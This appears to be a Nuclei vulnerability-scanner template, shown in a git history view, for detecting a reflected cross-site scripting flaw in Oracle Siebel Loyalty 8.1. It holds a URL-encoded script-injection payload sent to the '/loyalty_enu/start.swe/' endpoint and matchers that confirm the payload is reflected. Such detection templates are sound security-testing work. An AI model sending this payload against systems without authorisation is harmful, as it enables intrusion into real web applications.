nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml

30 lines
882 B
YAML
Raw Normal View History

2021-08-15 17:48:13 +00:00
id: oracle-siebel-xss
info:
2021-08-16 08:42:49 +00:00
name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
2021-08-15 17:48:13 +00:00
author: dhiyaneshDK
severity: medium
2021-10-21 05:52:48 +00:00
description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
2021-08-15 17:48:13 +00:00
reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
2021-08-16 08:42:49 +00:00
tags: xss,oracle
2021-08-15 17:48:13 +00:00
requests:
- method: GET
path:
2021-08-16 08:42:49 +00:00
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-15 17:48:13 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-16 08:42:49 +00:00
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
2021-08-15 17:48:13 +00:00
- type: status
status:
- 200